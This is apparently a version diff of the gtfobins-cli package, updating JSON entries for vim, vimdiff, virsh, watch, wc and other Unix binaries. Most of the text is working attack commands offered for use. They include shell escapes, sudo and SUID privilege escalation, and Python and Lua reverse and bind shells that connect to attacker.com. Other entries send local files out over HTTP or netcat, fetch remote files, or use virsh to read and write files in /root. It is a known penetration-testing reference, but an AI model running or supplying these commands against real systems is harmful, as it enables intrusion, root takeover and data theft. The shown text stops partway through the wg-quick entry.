gtfobins-cli 1.0.0__py3-none-any.whl → 1.1.0__py3-none-any.whl

gtfo/data/vim.json

@@ -2,108 +2,113 @@
   "functions": {
     "shell": [
       {
-        "code": "vim -c ':!/bin/sh'"
+        
+        "code": "vim -c ':!/bin/sh'\n"
       },
       {
-        "code": "vim\n:set shell=/bin/sh\n:shell\n"
+        
+        "code": "vim --cmd ':set shell=/bin/sh|:shell'\n"
       },
       {
-        "description": "This requires that 'vim' is compiled with Python support. Prepend ':py3' for Python 3.",
-        "code": "vim -c ':py import os; os.execl(\"/bin/sh\", \"sh\", \"-c\", \"reset; exec sh\")'"
+        "description": "This requires that `vim` is compiled with Python support. Prepend `:py3` for Python 3.",
+        "code": "vim -c ':py import os; os.execl(\"/bin/sh\", \"sh\", \"-c\", \"reset; exec sh\")'\n"
       },
       {
-        "description": "This requires that 'vim' is compiled with Lua support.",
-        "code": "vim -c ':lua os.execute(\"reset; exec sh\")'"
+        "description": "This requires that `vim` is compiled with Lua support.",
+        "code": "vim -c ':lua os.execute(\"reset; exec sh\")'\n"
       }
     ],
     "reverse-shell": [
       {
-        "description": "This requires that 'vim' is compiled with Python support. Prepend ':py3' for Python 3. Run 'socat file:`tty`,raw,echo=0 tcp-listen:[port]' on the attacker box to receive the shell.",
-        "code": "vim -c ':py import vim,sys,socket,os,pty;s=socket.socket()\ns.connect((\"[host]\",[port]))\n[os.dup2(s.fileno(),fd) for fd in (0,1,2)]\npty.spawn(\"/bin/sh\")\nvim.command(\":q!\")'\n"
+        "description": "This requires that `vim` is compiled with Python support. Prepend `:py3` for Python 3. Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell.",
+        "code": "export RHOST=attacker.com\nexport RPORT=12345\nvim -c ':py import vim,sys,socket,os,pty;s=socket.socket()\ns.connect((os.getenv(\"RHOST\"),int(os.getenv(\"RPORT\"))))\n[os.dup2(s.fileno(),fd) for fd in (0,1,2)]\npty.spawn(\"/bin/sh\")\nvim.command(\":q!\")'\n"
       }
     ],
     "non-interactive-reverse-shell": [
       {
-        "description": "Run 'nc -lp [port]' on the attacker box to receive the shell. This requires that 'vim' is compiled with Lua support and that 'lua-socket' is installed.",
-        "code": "vim -c ':lua local s=require(\"socket\"); local t=assert(s.tcp());\n  t:connect(\"[host]\",[port]);\n  while true do\n    local r,x=t:receive();local f=assert(io.popen(r,\"r\"));\n    local b=assert(f:read(\"*a\"));t:send(b);\n  end;\n  f:close();t:close();'\n"
+        "description": "Run ``nc -l -p 12345`` on the attacker box to receive the shell. This requires that `vim` is compiled with Lua support and that `lua-socket` is installed.",
+        "code": "export RHOST=attacker.com\nexport RPORT=12345\nvim -c ':lua local s=require(\"socket\"); local t=assert(s.tcp());\n  t:connect(os.getenv(\"RHOST\"),os.getenv(\"RPORT\"));\n  while true do\n    local r,x=t:receive();local f=assert(io.popen(r,\"r\"));\n    local b=assert(f:read(\"*a\"));t:send(b);\n  end;\n  f:close();t:close();'\n"
       }
     ],
     "non-interactive-bind-shell": [
       {
-        "description": "Run 'nc [host] [port]' on the attacker box to connect to the shell. This requires that 'vim' is compiled with Lua support and that 'lua-socket' is installed.",
-        "code": "vim -c ':lua local k=require(\"socket\");\n  local s=assert(k.bind(\"*\",[port]));\n  local c=s:accept();\n  while true do\n    local r,x=c:receive();local f=assert(io.popen(r,\"r\"));\n    local b=assert(f:read(\"*a\"));c:send(b);\n  end;c:close();f:close();'\n"
+        "description": "Run `nc target.com 12345` on the attacker box to connect to the shell. This requires that `vim` is compiled with Lua support and that `lua-socket` is installed.",
+        "code": "export LPORT=12345\nvim -c ':lua local k=require(\"socket\");\n  local s=assert(k.bind(\"*\",os.getenv(\"LPORT\")));\n  local c=s:accept();\n  while true do\n    local r,x=c:receive();local f=assert(io.popen(r,\"r\"));\n    local b=assert(f:read(\"*a\"));c:send(b);\n  end;c:close();f:close();'\n"
       }
     ],
     "file-upload": [
       {
-        "description": "This requires that 'vim' is compiled with Python support. Prepend ':py3' for Python 3. Send local file via 'd' parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.",
-        "code": "vim -c ':py import vim,sys;\nif sys.version_info.major == 3: import urllib.request as r, urllib.parse as u\nelse: import urllib as u, urllib2 as r\nr.urlopen(\"[url]\", bytes(u.urlencode({\"d\":open(\"[file]\").read()}).encode()))\nvim.command(\":q!\")'\n"
+        "description": "This requires that `vim` is compiled with Python support. Prepend `:py3` for Python 3. Send local file via \"d\" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.",
+        "code": "export URL=http://attacker.com/\nexport LFILE=file_to_send\nvim -c ':py import vim,sys; from os import environ as e\nif sys.version_info.major == 3: import urllib.request as r, urllib.parse as u\nelse: import urllib as u, urllib2 as r\nr.urlopen(e[\"URL\"], bytes(u.urlencode({\"d\":open(e[\"LFILE\"]).read()}).encode()))\nvim.command(\":q!\")'\n"
       },
       {
-        "description": "This requires that 'vim' is compiled with Python support. Prepend ':py3' for Python 3. Serve files in the local folder running an HTTP server.",
-        "code": "vim -c ':py import vim,sys;\nif sys.version_info.major == 3: import http.server as s, socketserver as ss\nelse: import SimpleHTTPServer as s, SocketServer as ss\nss.TCPServer((\"\", [port]), s.SimpleHTTPRequestHandler).serve_forever()\nvim.command(\":q!\")'\n"
+        "description": "This requires that `vim` is compiled with Python support. Prepend `:py3` for Python 3. Serve files in the local folder running an HTTP server.",
+        "code": "export LPORT=8888\nvim -c ':py import vim,sys; from os import environ as e\nif sys.version_info.major == 3: import http.server as s, socketserver as ss\nelse: import SimpleHTTPServer as s, SocketServer as ss\nss.TCPServer((\"\", int(e[\"LPORT\"])), s.SimpleHTTPRequestHandler).serve_forever()\nvim.command(\":q!\")'\n"
       },
       {
-        "description": "Send a local file via TCP. Run 'nc -lp [port] > [file]' on the attacker box to collect the file. This requires that 'vim' is compiled with Lua support and that 'lua-socket' is installed.",
-        "code": "vim -c ':lua local f=io.open(\"[file]\", 'rb')\n  local d=f:read(\"*a\")\n  io.close(f);\n  local s=require(\"socket\");\n  local t=assert(s.tcp());\n  t:connect(\"[host]\",[port]);\n  t:send(d);\n  t:close();'\n"
+        "description": "Send a local file via TCP. Run `nc -l -p 12345 > \"file_to_save\"` on the attacker box to collect the file. This requires that `vim` is compiled with Lua support and that `lua-socket` is installed.",
+        "code": "export RHOST=attacker.com\nexport RPORT=12345\nexport LFILE=file_to_send\nvim -c ':lua local f=io.open(os.getenv(\"LFILE\"), 'rb')\n  local d=f:read(\"*a\")\n  io.close(f);\n  local s=require(\"socket\");\n  local t=assert(s.tcp());\n  t:connect(os.getenv(\"RHOST\"),os.getenv(\"RPORT\"));\n  t:send(d);\n  t:close();'\n"
       }
     ],
     "file-download": [
       {
-        "description": "This requires that 'vim' is compiled with Python support. Prepend ':py3' for Python 3. Fetch a remote file via HTTP GET request.",
-        "code": "vim -c ':py import vim,sys;\nif sys.version_info.major == 3: import urllib.request as r\nelse: import urllib as r\nr.urlretrieve(\"[url]\", \"[file]\")\nvim.command(\":q!\")'\n"
+        "description": "This requires that `vim` is compiled with Python support. Prepend `:py3` for Python 3. Fetch a remote file via HTTP GET request.",
+        "code": "export URL=http://attacker.com/file_to_get\nexport LFILE=file_to_save\nvim -c ':py import vim,sys; from os import environ as e\nif sys.version_info.major == 3: import urllib.request as r\nelse: import urllib as r\nr.urlretrieve(e[\"URL\"], e[\"LFILE\"])\nvim.command(\":q!\")'\n"
       },
       {
-        "description": "Fetch a remote file via TCP. Run 'nc [host] [port] < [file]' on the attacker box to send the file. This requires that 'vim' is compiled with Lua support and that 'lua-socket' is installed.",
-        "code": "vim -c ':lua local k=require(\"socket\");\n  local s=assert(k.bind(\"*\",[port]));\n  local c=s:accept();\n  local d,x=c:receive(\"*a\");\n  c:close();\n  local f=io.open(\"[file]\", \"wb\");\n  f:write(d);\n  io.close(f);'\n"
+        "description": "Fetch a remote file via TCP. Run `nc target.com 12345 < \"file_to_send\"` on the attacker box to send the file. This requires that `vim` is compiled with Lua support and that `lua-socket` is installed.",
+        "code": "export LPORT=12345\nexport LFILE=file_to_save\nvim -c ':lua local k=require(\"socket\");\n  local s=assert(k.bind(\"*\",os.getenv(\"LPORT\")));\n  local c=s:accept();\n  local d,x=c:receive(\"*a\");\n  c:close();\n  local f=io.open(os.getenv(\"LFILE\"), \"wb\");\n  f:write(d);\n  io.close(f);'\n"
       }
     ],
     "file-write": [
       {
-        "code": "vim [file]\niDATA\n^[\nw\n"
+        
+        "code": "vim file_to_write\niDATA\n^[\nw\n"
       }
     ],
     "file-read": [
       {
-        "code": "vim [file]"
+        
+        "code": "vim file_to_read\n"
       }
     ],
     "library-load": [
       {
-        "description": "This requires that 'vim' is compiled with Python support. Prepend ':py3' for Python 3.",
-        "code": "vim -c ':py import vim; from ctypes import cdll; cdll.LoadLibrary(\"lib.so\"); vim.command(\":q!\")'"
+        "description": "This requires that `vim` is compiled with Python support. Prepend `:py3` for Python 3.",
+        "code": "vim -c ':py import vim; from ctypes import cdll; cdll.LoadLibrary(\"lib.so\"); vim.command(\":q!\")'\n"
       }
     ],
     "suid": [
       {
-        "description": "This requires that 'vim' is compiled with Python support. Prepend ':py3' for Python 3.",
-        "code": "./vim -c ':py import os; os.execl(\"/bin/sh\", \"sh\", \"-pc\", \"reset; exec sh -p\")'"
+        "description": "This requires that `vim` is compiled with Python support. Prepend `:py3` for Python 3.",
+        "code": "./vim -c ':py import os; os.execl(\"/bin/sh\", \"sh\", \"-pc\", \"reset; exec sh -p\")'\n"
       }
     ],
     "sudo": [
       {
-        "code": "sudo vim -c ':!/bin/sh'"
+        
+        "code": "sudo vim -c ':!/bin/sh'\n"
       },
       {
-        "description": "This requires that 'vim' is compiled with Python support. Prepend ':py3' for Python 3.",
-        "code": "sudo vim -c ':py import os; os.execl(\"/bin/sh\", \"sh\", \"-c\", \"reset; exec sh\")'"
+        "description": "This requires that `vim` is compiled with Python support. Prepend `:py3` for Python 3.",
+        "code": "sudo vim -c ':py import os; os.execl(\"/bin/sh\", \"sh\", \"-c\", \"reset; exec sh\")'\n"
       },
       {
-        "description": "This requires that 'vim' is compiled with Lua support.",
-        "code": "sudo vim -c ':lua os.execute(\"reset; exec sh\")'"
+        "description": "This requires that `vim` is compiled with Lua support.",
+        "code": "sudo vim -c ':lua os.execute(\"reset; exec sh\")'\n"
       }
     ],
     "capabilities": [
       {
-        "description": "This requires that 'vim' is compiled with Python support. Prepend ':py3' for Python 3.",
-        "code": "./vim -c ':py import os; os.setuid(0); os.execl(\"/bin/sh\", \"sh\", \"-c\", \"reset; exec sh\")'"
+        "description": "This requires that `vim` is compiled with Python support. Prepend `:py3` for Python 3.",
+        "code": "./vim -c ':py import os; os.setuid(0); os.execl(\"/bin/sh\", \"sh\", \"-c\", \"reset; exec sh\")'\n"
       }
     ],
     "limited-suid": [
       {
-        "description": "This requires that 'vim' is compiled with Lua support.",
-        "code": "./vim -c ':lua os.execute(\"reset; exec sh\")'"
+        "description": "This requires that `vim` is compiled with Lua support.",
+        "code": "./vim -c ':lua os.execute(\"reset; exec sh\")'\n"
       }
     ]
   }
-}
+}

gtfo/data/vimdiff.json

@@ -2,107 +2,112 @@
   "functions": {
     "shell": [
       {
-        "code": "vimdiff -c ':!/bin/sh'"
+        
+        "code": "vimdiff -c ':!/bin/sh'\n"
       },
       {
+        
         "code": "vimdiff\n:set shell=/bin/sh\n:shell\n"
       },
       {
-        "description": "This requires that 'vimdiff' is compiled with Python support. Prepend ':py3' for Python 3.",
-        "code": "vimdiff -c ':py import os; os.execl(\"/bin/sh\", \"sh\", \"-c\", \"reset; exec sh\")'"
+        "description": "This requires that `vimdiff` is compiled with Python support. Prepend `:py3` for Python 3.",
+        "code": "vimdiff -c ':py import os; os.execl(\"/bin/sh\", \"sh\", \"-c\", \"reset; exec sh\")'\n"
       },
       {
-        "description": "This requires that 'vimdiff' is compiled with Lua support.",
-        "code": "vimdiff -c ':lua os.execute(\"reset; exec sh\")'"
+        "description": "This requires that `vimdiff` is compiled with Lua support.",
+        "code": "vimdiff -c ':lua os.execute(\"reset; exec sh\")'\n"
       }
     ],
     "reverse-shell": [
       {
-        "description": "This requires that 'vimdiff' is compiled with Python support. Prepend ':py3' for Python 3. Run 'socat file:`tty`,raw,echo=0 tcp-listen:[port]' on the attacker box to receive the shell.",
-        "code": "vimdiff -c ':py import vim,sys,socket,os,pty;s=socket.socket()\ns.connect((\"[host]\",[port]))\n[os.dup2(s.fileno(),fd) for fd in (0,1,2)]\npty.spawn(\"/bin/sh\")\nvim.command(\":q!\")'\n"
+        "description": "This requires that `vimdiff` is compiled with Python support. Prepend `:py3` for Python 3. Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell.",
+        "code": "export RHOST=attacker.com\nexport RPORT=12345\nvimdiff -c ':py import vim,sys,socket,os,pty;s=socket.socket()\ns.connect((os.getenv(\"RHOST\"),int(os.getenv(\"RPORT\"))))\n[os.dup2(s.fileno(),fd) for fd in (0,1,2)]\npty.spawn(\"/bin/sh\")\nvim.command(\":q!\")'\n"
       }
     ],
     "non-interactive-reverse-shell": [
       {
-        "description": "Run 'nc -l -p [port]' on the attacker box to receive the shell. This requires that 'vimdiff' is compiled with Lua support and that 'lua-socket' is installed.",
-        "code": "vimdiff -c ':lua local s=require(\"socket\"); local t=assert(s.tcp());\n  t:connect(\"[host]\",[port]);\n  while true do\n    local r,x=t:receive();local f=assert(io.popen(r,\"r\"));\n    local b=assert(f:read(\"*a\"));t:send(b);\n  end;\n  f:close();t:close();'\n"
+        "description": "Run ``nc -l -p 12345`` on the attacker box to receive the shell. This requires that `vimdiff` is compiled with Lua support and that `lua-socket` is installed.",
+        "code": "export RHOST=attacker.com\nexport RPORT=12345\nvimdiff -c ':lua local s=require(\"socket\"); local t=assert(s.tcp());\n  t:connect(os.getenv(\"RHOST\"),os.getenv(\"RPORT\"));\n  while true do\n    local r,x=t:receive();local f=assert(io.popen(r,\"r\"));\n    local b=assert(f:read(\"*a\"));t:send(b);\n  end;\n  f:close();t:close();'\n"
       }
     ],
     "non-interactive-bind-shell": [
       {
-        "description": "Run 'nc [host] [port]' on the attacker box to connect to the shell. This requires that 'vimdiff' is compiled with Lua support and that 'lua-socket' is installed.",
-        "code": "vimdiff -c ':lua local k=require(\"socket\");\n  local s=assert(k.bind(\"*\",[port]));\n  local c=s:accept();\n  while true do\n    local r,x=c:receive();local f=assert(io.popen(r,\"r\"));\n    local b=assert(f:read(\"*a\"));c:send(b);\n  end;c:close();f:close();'\n"
+        "description": "Run `nc target.com 12345` on the attacker box to connect to the shell. This requires that `vimdiff` is compiled with Lua support and that `lua-socket` is installed.",
+        "code": "export LPORT=12345\nvimdiff -c ':lua local k=require(\"socket\");\n  local s=assert(k.bind(\"*\",os.getenv(\"LPORT\")));\n  local c=s:accept();\n  while true do\n    local r,x=c:receive();local f=assert(io.popen(r,\"r\"));\n    local b=assert(f:read(\"*a\"));c:send(b);\n  end;c:close();f:close();'\n"
       }
     ],
     "file-upload": [
       {
-        "description": "This requires that 'vimdiff' is compiled with Python support. Prepend ':py3' for Python 3. Send local file via 'd' parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.",
-        "code": "vimdiff -c ':py import vim,sys\nif sys.version_info.major == 3: import urllib.request as r, urllib.parse as u\nelse: import urllib as u, urllib2 as r\nr.urlopen(\"[host]\", bytes(u.urlencode({\"d\":open(\"[file]\").read()}).encode()))\nvim.command(\":q!\")'\n"
+        "description": "This requires that `vimdiff` is compiled with Python support. Prepend `:py3` for Python 3. Send local file via \"d\" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.",
+        "code": "export URL=http://attacker.com/\nexport LFILE=file_to_send\nvimdiff -c ':py import vim,sys; from os import environ as e\nif sys.version_info.major == 3: import urllib.request as r, urllib.parse as u\nelse: import urllib as u, urllib2 as r\nr.urlopen(e[\"URL\"], bytes(u.urlencode({\"d\":open(e[\"LFILE\"]).read()}).encode()))\nvim.command(\":q!\")'\n"
       },
       {
-        "description": "This requires that 'vimdiff' is compiled with Python support. Prepend ':py3' for Python 3. Serve files in the local folder running an HTTP server.",
-        "code": "vimdiff -c ':py import vim,sys\nif sys.version_info.major == 3: import http.server as s, socketserver as ss\nelse: import SimpleHTTPServer as s, SocketServer as ss\nss.TCPServer((\"\", [port]), s.SimpleHTTPRequestHandler).serve_forever()\nvim.command(\":q!\")'\n"
+        "description": "This requires that `vimdiff` is compiled with Python support. Prepend `:py3` for Python 3. Serve files in the local folder running an HTTP server.",
+        "code": "export LPORT=8888\nvimdiff -c ':py import vim,sys; from os import environ as e\nif sys.version_info.major == 3: import http.server as s, socketserver as ss\nelse: import SimpleHTTPServer as s, SocketServer as ss\nss.TCPServer((\"\", int(e[\"LPORT\"])), s.SimpleHTTPRequestHandler).serve_forever()\nvim.command(\":q!\")'\n"
       },
       {
-        "description": "Send a local file via TCP. Run 'nc -l -p [port] > [file]' on the attacker box to collect the file. This requires that 'vimdiff' is compiled with Lua support and that 'lua-socket' is installed.",
-        "code": "vimdiff -c ':lua local f=io.open(\"[file]\", 'rb')\n  local d=f:read(\"*a\")\n  io.close(f);\n  local s=require(\"socket\");\n  local t=assert(s.tcp());\n  t:connect(\"[host]\",[port]);\n  t:send(d);\n  t:close();'\n"
+        "description": "Send a local file via TCP. Run `nc -l -p 12345 > \"file_to_save\"` on the attacker box to collect the file. This requires that `vimdiff` is compiled with Lua support and that `lua-socket` is installed.",
+        "code": "export RHOST=attacker.com\nexport RPORT=12345\nexport LFILE=file_to_send\nvimdiff -c ':lua local f=io.open(os.getenv(\"LFILE\"), 'rb')\n  local d=f:read(\"*a\")\n  io.close(f);\n  local s=require(\"socket\");\n  local t=assert(s.tcp());\n  t:connect(os.getenv(\"RHOST\"),os.getenv(\"RPORT\"));\n  t:send(d);\n  t:close();'\n"
       }
     ],
     "file-download": [
       {
-        "description": "This requires that 'vimdiff' is compiled with Python support. Prepend ':py3' for Python 3. Fetch a remote file via HTTP GET request.",
-        "code": "vimdiff -c ':py import vim,sys\nif sys.version_info.major == 3: import urllib.request as r\nelse: import urllib as r\nr.urlretrieve(\"[host]\", \"[file]\")\nvim.command(\":q!\")'\n"
+        "description": "This requires that `vimdiff` is compiled with Python support. Prepend `:py3` for Python 3. Fetch a remote file via HTTP GET request.",
+        "code": "export URL=http://attacker.com/file_to_get\nexport LFILE=file_to_save\nvimdiff -c ':py import vim,sys; from os import environ as e\nif sys.version_info.major == 3: import urllib.request as r\nelse: import urllib as r\nr.urlretrieve(e[\"URL\"], e[\"LFILE\"])\nvim.command(\":q!\")'\n"
       },
       {
-        "description": "Fetch a remote file via TCP. Run 'nc [host] [port] < [file]' on the attacker box to send the file. This requires that 'vimdiff' is compiled with Lua support and that 'lua-socket' is installed.",
-        "code": "vimdiff -c ':lua local k=require(\"socket\");\n  local s=assert(k.bind(\"*\",[port]));\n  local c=s:accept();\n  local d,x=c:receive(\"*a\");\n  c:close();\n  local f=io.open(\"[file]\", \"wb\");\n  f:write(d);\n  io.close(f);'\n"
+        "description": "Fetch a remote file via TCP. Run `nc target.com 12345 < \"file_to_send\"` on the attacker box to send the file. This requires that `vimdiff` is compiled with Lua support and that `lua-socket` is installed.",
+        "code": "export LPORT=12345\nexport LFILE=file_to_save\nvimdiff -c ':lua local k=require(\"socket\");\n  local s=assert(k.bind(\"*\",os.getenv(\"LPORT\")));\n  local c=s:accept();\n  local d,x=c:receive(\"*a\");\n  c:close();\n  local f=io.open(os.getenv(\"LFILE\"), \"wb\");\n  f:write(d);\n  io.close(f);'\n"
       }
     ],
     "file-write": [
       {
-        "code": "vimdiff [file]\ni[data]\n^[\nw\n"
+        
+        "code": "vimdiff file_to_write\niDATA\n^[\nw\n"
       }
     ],
     "file-read": [
       {
-        "code": "vimdiff [file]"
+        
+        "code": "vimdiff file_to_read\n"
       }
     ],
     "library-load": [
       {
-        "description": "This requires that 'vimdiff' is compiled with Python support. Prepend ':py3' for Python 3.",
-        "code": "vimdiff -c ':py import vim; from ctypes import cdll; cdll.LoadLibrary(\"lib.so\"); vim.command(\":q!\")'"
+        "description": "This requires that `vimdiff` is compiled with Python support. Prepend `:py3` for Python 3.",
+        "code": "vimdiff -c ':py import vim; from ctypes import cdll; cdll.LoadLibrary(\"lib.so\"); vim.command(\":q!\")'\n"
       }
     ],
     "suid": [
       {
-        "description": "This requires that 'vimdiff' is compiled with Python support. Prepend ':py3' for Python 3.",
-        "code": "./vimdiff -c ':py import os; os.execl(\"/bin/sh\", \"sh\", \"-pc\", \"reset; exec sh -p\")'"
+        "description": "This requires that `vimdiff` is compiled with Python support. Prepend `:py3` for Python 3.",
+        "code": "./vimdiff -c ':py import os; os.execl(\"/bin/sh\", \"sh\", \"-pc\", \"reset; exec sh -p\")'\n"
       }
     ],
     "sudo": [
       {
-        "code": "sudo vimdiff -c ':!/bin/sh'"
+        
+        "code": "sudo vimdiff -c ':!/bin/sh'\n"
       },
       {
-        "description": "This requires that 'vimdiff' is compiled with Python support. Prepend ':py3' for Python 3.",
-        "code": "sudo vimdiff -c ':py import os; os.execl(\"/bin/sh\", \"sh\", \"-c\", \"reset; exec sh\")'"
+        "description": "This requires that `vimdiff` is compiled with Python support. Prepend `:py3` for Python 3.",
+        "code": "sudo vimdiff -c ':py import os; os.execl(\"/bin/sh\", \"sh\", \"-c\", \"reset; exec sh\")'\n"
       },
       {
-        "description": "This requires that 'vimdiff' is compiled with Lua support.",
-        "code": "sudo vimdiff -c ':lua os.execute(\"reset; exec sh\")'"
+        "description": "This requires that `vimdiff` is compiled with Lua support.",
+        "code": "sudo vimdiff -c ':lua os.execute(\"reset; exec sh\")'\n"
       }
     ],
     "capabilities": [
       {
-        "description": "This requires that 'vimdiff' is compiled with Python support. Prepend ':py3' for Python 3.",
-        "code": "./vimdiff -c ':py import os; os.setuid(0); os.execl(\"/bin/sh\", \"sh\", \"-c\", \"reset; exec sh\")'"
+        "description": "This requires that `vimdiff` is compiled with Python support. Prepend `:py3` for Python 3.",
+        "code": "./vimdiff -c ':py import os; os.setuid(0); os.execl(\"/bin/sh\", \"sh\", \"-c\", \"reset; exec sh\")'\n"
       }
     ],
     "limited-suid": [
       {
-        "description": "This requires that 'vimdiff' is compiled with Lua support.",
-        "code": "./vimdiff -c ':lua os.execute(\"reset; exec sh\")'"
+        "description": "This requires that `vimdiff` is compiled with Lua support.",
+        "code": "./vimdiff -c ':lua os.execute(\"reset; exec sh\")'\n"
       }
     ]
   }

gtfo/data/vipw.json

@@ -0,0 +1,16 @@
+{
+  "functions": {
+    "suid": [
+      {
+        
+        "code": "./vipw\n"
+      }
+    ],
+    "sudo": [
+      {
+        
+        "code": "sudo vipw\n"
+      }
+    ]
+  }
+}

gtfo/data/virsh.json

@@ -2,19 +2,20 @@
   "functions": {
     "sudo": [
       {
-        "code": "TF=$(mktemp)\ncat > $TF << EOF\n<domain type='kvm'>\n  <name>x</name>\n  <os>\n    <type arch='x86_64'>hvm</type>\n  </os>\n  <memory unit='KiB'>1</memory>\n  <devices>\n    <interface type='ethernet'>\n      <script path='[script]'/>\n    </interface>\n  </devices>\n</domain>\nEOF\nsudo virsh -c qemu:///system create $TF\nvirsh -c qemu:///system destroy x\n"
+        
+        "code": "SCRIPT=script_to_run\nTF=$(mktemp)\ncat > $TF << EOF\n<domain type='kvm'>\n  <name>x</name>\n  <os>\n    <type arch='x86_64'>hvm</type>\n  </os>\n  <memory unit='KiB'>1</memory>\n  <devices>\n    <interface type='ethernet'>\n      <script path='$SCRIPT'/>\n    </interface>\n  </devices>\n</domain>\nEOF\nsudo virsh -c qemu:///system create $TF\nvirsh -c qemu:///system destroy x\n"
       }
     ],
     "file-write": [
       {
-        "description": "This requires the user to be in the 'libvirt' group to perform privileged file write. If the target directory doesn't exist, 'pool-create-as' must be run with the '--build' option. The destination file ownership and permissions can be set in the XML.",
-        "code": "echo '[data]' > [data_to_write]\n\nTF=$(mktemp)\ncat > $TF <<EOF\n<volume type='file'>\n  <name>y</name>\n  <key>[dir]/[file]</key>\n  <source>\n  </source>\n  <capacity unit='bytes'>5</capacity>\n  <allocation unit='bytes'>4096</allocation>\n  <physical unit='bytes'>5</physical>\n  <target>\n    <path>[dir]/[file]</path>\n    <format type='raw'/>\n    <permissions>\n      <mode>0600</mode>\n      <owner>0</owner>\n      <group>0</group>\n    </permissions>\n  </target>\n</volume>\nEOF\n\nvirsh -c qemu:///system pool-create-as x dir --target [dir]\nvirsh -c qemu:///system vol-create --pool x --file $TF\nvirsh -c qemu:///system vol-upload --pool x [dir]/[file] [data_to_write]\nvirsh -c qemu:///system pool-destroy x\n"
+        "description": "This requires the user to be in the `libvirt` group to perform privileged file write. If the target directory doesn't exist, `pool-create-as` must be run with the `--build` option. The destination file ownership and permissions can be set in the XML.",
+        "code": "LFILE_DIR=/root\nLFILE_NAME=file_to_write\n\necho 'data' > data_to_write\n\nTF=$(mktemp)\ncat > $TF <<EOF\n<volume type='file'>\n  <name>y</name>\n  <key>$LFILE_DIR/$LFILE_NAME</key>\n  <source>\n  </source>\n  <capacity unit='bytes'>5</capacity>\n  <allocation unit='bytes'>4096</allocation>\n  <physical unit='bytes'>5</physical>\n  <target>\n    <path>$LFILE_DIR/$LFILE_NAME</path>\n    <format type='raw'/>\n    <permissions>\n      <mode>0600</mode>\n      <owner>0</owner>\n      <group>0</group>\n    </permissions>\n  </target>\n</volume>\nEOF\n\nvirsh -c qemu:///system pool-create-as x dir --target $LFILE_DIR\nvirsh -c qemu:///system vol-create --pool x --file $TF\nvirsh -c qemu:///system vol-upload --pool x $LFILE_DIR/$LFILE_NAME data_to_write\nvirsh -c qemu:///system pool-destroy x\n"
       }
     ],
     "file-read": [
       {
-        "description": "This requires the user to be in the 'libvirt' group to perform privileged file read.",
-        "code": "virsh -c qemu:///system pool-create-as x dir --target /root\nvirsh -c qemu:///system vol-download --pool x [file] [file_to_save]\nvirsh -c qemu:///system pool-destroy x\n"
+        "description": "This requires the user to be in the `libvirt` group to perform privileged file read.",
+        "code": "LFILE_DIR=/root\nLFILE_NAME=file_to_read\n\nSPATH=file_to_save\n\nvirsh -c qemu:///system pool-create-as x dir --target $LFILE_DIR\nvirsh -c qemu:///system vol-download --pool x $LFILE_NAME $SPATH\nvirsh -c qemu:///system pool-destroy x\n"
       }
     ]
   }

gtfo/data/volatility.json

@@ -0,0 +1,10 @@
+{
+  "functions": {
+    "shell": [
+      {
+        
+        "code": "volatility -f file.dump volshell\n__import__('os').system('/bin/sh')\n"
+      }
+    ]
+  }
+}

gtfo/data/w3m.json

@@ -0,0 +1,22 @@
+{
+  "functions": {
+    "file-read": [
+      {
+        
+        "code": "LFILE=file_to_read\nw3m \"$LFILE\" -dump\n"
+      }
+    ],
+    "suid": [
+      {
+        
+        "code": "LFILE=file_to_read\n./w3m \"$LFILE\" -dump\n"
+      }
+    ],
+    "sudo": [
+      {
+        
+        "code": "LFILE=file_to_read\nsudo w3m \"$LFILE\" -dump\n"
+      }
+    ]
+  }
+}

gtfo/data/wall.json

@@ -0,0 +1,10 @@
+{
+  "functions": {
+    "sudo": [
+      {
+        
+        "code": "LFILE=file_to_read\nsudo wall --nobanner \"$LFILE\"\n"
+      }
+    ]
+  }
+}

gtfo/data/watch.json

@@ -2,24 +2,27 @@
   "functions": {
     "shell": [
       {
-        "code": "watch -x sh -c 'reset; exec sh 1>&0 2>&0'"
+        
+        "code": "watch -x sh -c 'reset; exec sh 1>&0 2>&0'\n"
       }
     ],
     "suid": [
       {
-        "description": "This keeps the SUID privileges only if the '-x' option is present.",
-        "code": "./watch -x sh -c 'reset; exec sh 1>&0 2>&0'"
+        "description": "This keeps the SUID privileges only if the `-x` option is present.",
+        "code": "./watch -x sh -p -c 'reset; exec sh -p 1>&0 2>&0'\n"
       }
     ],
     "sudo": [
       {
-        "code": "sudo watch -x sh -c 'reset; exec sh 1>&0 2>&0'"
+        
+        "code": "sudo watch -x sh -c 'reset; exec sh 1>&0 2>&0'\n"
       }
     ],
     "limited-suid": [
       {
-        "code": "./watch 'reset; exec sh 1>&0 2>&0'"
+        
+        "code": "./watch 'reset; exec sh 1>&0 2>&0'\n"
       }
     ]
   }
-}
+}

gtfo/data/wc.json

@@ -1,19 +1,21 @@
 {
-  "description": "The file content is parsed as a sequence of '\\x00' separated paths. On error the file content appears in a message, so this may not be suitable to read binary files.",
   "functions": {
     "file-read": [
       {
-        "code": "wc --files0-from \"[file]\"\n"
+        
+        "code": "LFILE=file_to_read\nwc --files0-from \"$LFILE\"\n"
       }
     ],
     "suid": [
       {
-        "code": "./wc --files0-from \"[file]\"\n"
+        
+        "code": "LFILE=file_to_read\n./wc --files0-from \"$LFILE\"\n"
       }
     ],
     "sudo": [
       {
-        "code": "sudo wc --files0-from \"[file]\"\n"
+        
+        "code": "LFILE=file_to_read\nsudo wc --files0-from \"$LFILE\"\n"
       }
     ]
   }

gtfo/data/wg-quick.json

@@ -0,0 +1,10 @@
+{
+  "functions": {
+    "sudo": [
+      {
+        "description": "If the `sudo -l` shows such a binary in the output\n\n```\n(ALL) PASSWD: /usr/bin/wg-quick,\n```\n\nThis feature can be abused.\n",
